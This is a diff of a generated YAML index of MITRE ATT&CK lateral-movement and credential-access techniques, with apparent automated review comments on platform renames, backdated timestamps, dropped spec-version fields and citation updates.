+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
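Review bot: the only content change in this external_references block is the `Havana authentication bug` citation, whose url moves from `http://lists.openstack.org/...` to `https://lists.openstack.org/...` and whose retrieval date becomes September 12, 2024; everything else is the same set of citations re-emitted in a different order, plus `revoked: false` and the spec version bump to 3.2.0. If the generator sorted citations by source_name (or preserved the upstream order deterministically), reorder churn like this would not bury the one real edit; as it stands, please check that the new https link resolves before merging.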
@@ -41373,11 +42061,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
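Review bot: `- Office 365` is replaced by `- Office Suite` in x_mitre_platforms with the version bumped from 1.4 to 1.5, and the same platform consolidation recurs below: T1550 drops `Office 365` and `Google Workspace` for `Identity Provider` and `Office Suite`, T1021.007 drops `Office 365`, `Azure AD` and `Google Workspace` for `Office Suite` and `Identity Provider`, and T1534 and T1550.004 drop `Office 365` and `Google Workspace` for `Office Suite`. Any downstream consumer that filters this index on the literal strings `Office 365`, `Google Workspace` or `Azure AD` will silently match nothing after this change, so the per-platform index generation should be checked against the new names, and the rename deserves a line in the PR description.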
@@ -41400,9 +42088,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -41453,7 +42140,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -41517,7 +42203,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -41588,7 +42273,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -41625,7 +42309,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
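Review bot: the `modified` timestamp for T1563.001 moves backwards here, from '2021-04-29T14:49:39.188Z' to '2020-03-23T23:11:24.682Z'. A regenerated index should never make an object older; this usually means the generator is now reading a different STIX object (for example a deprecated or superseded copy) than the one the previous index was built from, so please confirm which upstream object this entry is meant to track before merging.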
@@ -41656,8 +42340,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
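Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted from T1563.001 and nothing is added in their place, so this entry ends up with no spec version field at all, unlike the surrounding techniques, which keep `x_mitre_attack_spec_version` (3.1.0 or 3.2.0) after their `spec_version` line is dropped. Either the generator should emit the attack spec version it finds on the source object, or the absence should be intentional and documented; together with the backwards `modified` date in the previous hunk it looks like a stale source object.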
@@ -41740,12 +42422,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -41772,6 +42453,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -41789,12 +42471,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41820,14 +42502,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -41945,7 +42626,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -41999,11 +42679,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42055,14 +42734,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
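Review bot: the `Microsoft WinRM` citation is modernised from `http://msdn.microsoft.com/en-us/library/aa384426` to `https://learn.microsoft.com/en-us/windows/win32/winrm/portal` with a fresh retrieval date, which is good, but the adjacent citation two lines above it still points at `https://msdn.microsoft.com/en-us/library/aa394582.aspx`; msdn links redirect today, yet if the intent is to retire msdn URLs it would be worth doing so consistently within the same entry.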
@@ -42148,12 +42826,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42173,6 +42850,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42180,7 +42858,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42196,39 +42873,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
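Review bot: the `GentilKiwi Pass the Ticket` citation now points at a web.archive.org snapshot (`https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos`) with the retrieval date updated to September 12, 2024, which is the right fix for a blog URL that has gone stale; the rest of this block is the same citations in a new order plus `revoked: false` and the 3.2.0 spec bump. Please confirm the snapshot timestamp actually captures the article and not a redirect page.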
@@ -42253,12 +42931,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42272,13 +42949,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42295,7 +42971,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42343,7 +43019,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42376,7 +43052,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42415,7 +43090,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42449,12 +43124,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
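Review bot: the T1210 entry shows the same two symptoms as T1563.001 above: its `modified` timestamp moves backwards from '2022-05-11T14:00:00.188Z' to '2022-02-24T15:06:46.006Z' in the preceding hunk, and here `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are both removed without replacement, leaving no spec version field on the object. These are the only two entries in this range that lose every spec-version field, so they are best checked together against the upstream STIX bundle the generator was pointed at.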
@@ -42482,10 +43155,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
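Review bot: The platform list for T1534 drops `Office 365` and `Google Workspace` in favour of the single `Office Suite` entry, with the version bumped 1.3 to 1.4. Anything downstream that filters or builds indexes on the old platform strings will stop matching this technique, so the derived artifacts should be regenerated in the same change. The same consolidation (and `Azure AD` to `Identity Provider`) recurs below for T1550.004, T1550.001, T1110.001, T1539, T1110.002 and T1606.002.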
@@ -42515,7 +43187,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -42577,12 +43248,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42606,11 +43276,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -42635,9 +43304,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -42697,7 +43365,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -42752,7 +43419,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -42820,12 +43486,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -42882,6 +43547,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -42892,13 +43558,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -42957,7 +43622,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43051,49 +43715,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
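Review bot: The removed block for T1556.003 takes out `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all six `external_references` entries, so this is only safe if the following hunk re-adds every one of them; please check that list against the re-add rather than trusting the line count. Separately, the unchanged description lines break mid-sentence before `, which retrieves`, `and /etc/shadow` and `.(Citation: Apple PAM)`; inside a `|-` block scalar those become literal newlines in the rendered text, a pre-existing export artifact worth fixing in the generator.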
@@ -43108,20 +43733,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
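Review bot: `x_mitre_permissions_required: [root]` is the one field from the old T1556.003 object that is dropped and never re-added, while `revoked: false` and `x_mitre_deprecated: false` are new and the `external_references` order changes (PAM Creds now precedes Red Hat PAM, `url` moves after `description`). If any tooling still reads `x_mitre_permissions_required`, the silent drop should be called out in the commit message alongside the 2.0 to 2.1 version bump. The `x_mitre_detection` context also carries the stray newline pattern (`/etc/pam.d/` followed by `)` on its own line).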
@@ -43201,12 +43863,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
